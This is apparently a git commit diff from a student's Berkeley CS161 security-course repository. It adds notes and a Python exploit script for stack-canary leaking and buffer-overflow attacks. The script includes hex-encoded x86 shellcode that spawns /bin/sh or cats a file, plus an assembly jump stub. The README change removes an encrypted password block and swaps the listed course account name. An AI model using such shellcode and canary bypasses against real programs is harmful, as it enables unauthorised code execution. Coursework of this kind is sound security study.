fucking documents

a29af5fc · Recolic Keghart · 29898fdf · a29af5fc · a29af5fc · a29af5fc
Unverified Commit a29af5fc authored 6 years ago by Recolic Keghart
--- a/README.md
+++ b/README.md
 # cs161
+
 ucb cs161 labs

 Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
@@ -7,33 +8,9 @@ Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/

 https://acropolis.cs.berkeley.edu/~account/webacct/

-Account: 	cs164-ace
-
-Password: 
-
-```
-----BEGIN PGP MESSAGE-----
-
-hQIMA6EZKPzHVYaOAQ/+JCpketz1mF7XNV63fhDfF2PYHLU4HoDjA63gRyBnhj2h
-CRVxVF6gRpQhO7yV6YGUEX+w3wIfusRlTml2OAKSmV1dYUtFsP+jvrpac9CmWVhs
-UmB1PR0+YaVZZOIUASuj7cCCPkulUccVWhMGc3soB86hnRj/1zJAGTwIZE5l2x7m
-+xzOGSK8wg42j1a69J5bkZ7gIyzRd/9RYePrbvttvDhELeJeWZiTG/hhL4i1wrWA
-KdR+N0FzwUMNpa5WiHgZhkXOmfVOVcIJBiS7M7c03NTXocqpM8T/3JfwyrGd99Nh
-M7fiwBGpITzGyxPmy/2YIOuCw+EodLTqPNKzwof7VuWh832r8YpwLqeRxFvSdvEJ
-fvMAyqV8CzwB3VNzUDTULd6MMyHZI3nThP9WZPegkjBgLF0ucD30Q63wNRvAd6po
-VVOEepzrAfEtX0ek/me88cRRceBZIhFx1CQMDKZB0blgu59eqGNEtVEs9tck13kl
-qo5ZP6W+SMoCs2RJipVgKP3MnKBFMSj0GuzewSpYpm2XAjK7TS3lLGmlps0+Ok6r
-Ciley/Ns3c7miMcKYn+EVPoZ1J59RWbnxN8xpPoScafryAFYMeGLqtqerAVuj4tv
-5zpixrE3iqwt+3nL4hKdzmwUHywhAJvPclIwUxT9SqY5sFS8ZH5xheO4N1v97SLS
-tgE6esur88tbMaTY8oUOQ3NJ9uFAmrOs9IewRptTZwIQksEzJhjnMegdCm3MPbGX
-6hM/ukIMgA77zzwDiJcZB00NTjk0pFCmdpqVpa2bRYPvDRmIgifIbdsPTtaMNp9j
-YVfeaoGUpN+YWPy/08gpz7/dCl+dMCjzx/5ZXQy1mc8lIu/f9Wh7kJJ8G7cN6CC9
-3TK4iuR3wZ6HbH3R+cljhtgMfOcutTWdrEB+erR4J+setOfWihXs
-=tuDB
-----END PGP MESSAGE-----
-```
-
-to change the password: `ssh update.cs.berkeley.edu`
+Account: 	cs161-atw
+
+To change the password: `ssh update.cs.berkeley.edu`



--- a/proj1/161-proj1-5.png
+++ b/proj1/161-proj1-5.png
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -223,6 +223,11 @@ with open('/dev/fd/1','wb') as f:

 ## 4

+The solution is easy. Since BUFLEN=16, I send `0123456789ab\x`, then dehexify skips the `\0` and prints everything in canary area.
+
+Now I construct a message with 16 junk characters to fill the buffer, correct canary, another 8 characters to shift ebp & other staffes, and the return address, then the shellcode.
+
+
 ## 5

 - motivation
@@ -266,8 +271,22 @@ However, we need a fixed-address writable page to put `%ebp`. The page `0x080480

 Please see the image below. The procedure is too complicated to explain.

+![Please contact root@recolic.net if you can not view this image](https://dl.recolic.net/res/161-proj1-5.png)

+Because I have 40 bytes ahead for payload, I can put a shellcode to launch /bin/sh directly. But if I want to create tcp server, I have to write a simple payload and jmp to `&buf+68`. The simple payload is attached below.
+
+```
+// get current addr
+call foo
+foo:
+pop %eax
+
+// 40 + 4+4+4+4+4+4+4 - 5
+add $63, %eax
+jmp *%eax
+```

+I put 5 `nop` at `&buf+68` to make it work even if I have made a mistake.



--- a/proj1/solution/interact4
+++ b/proj1/solution/interact4
@@ -47,17 +47,19 @@ canary = reply_canary
 fill2 = "\0"*8
 retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
 #payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+# This payload works! It cat README to stdout. Uncomment print(p.recvline()) to use it.
 payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
-#payload = SHELLCODE
+# This payload also works! It cat README to stderr.
+payload = SHELLCODE + '\0'

 msg = fill1 + canary + fill2 + retaddr + payload + '\n'
 #print(msg)
 p.send(msg)
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+##print(p.recvline())

 # HINT: the last line of your exploit should look something like:
 #   p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')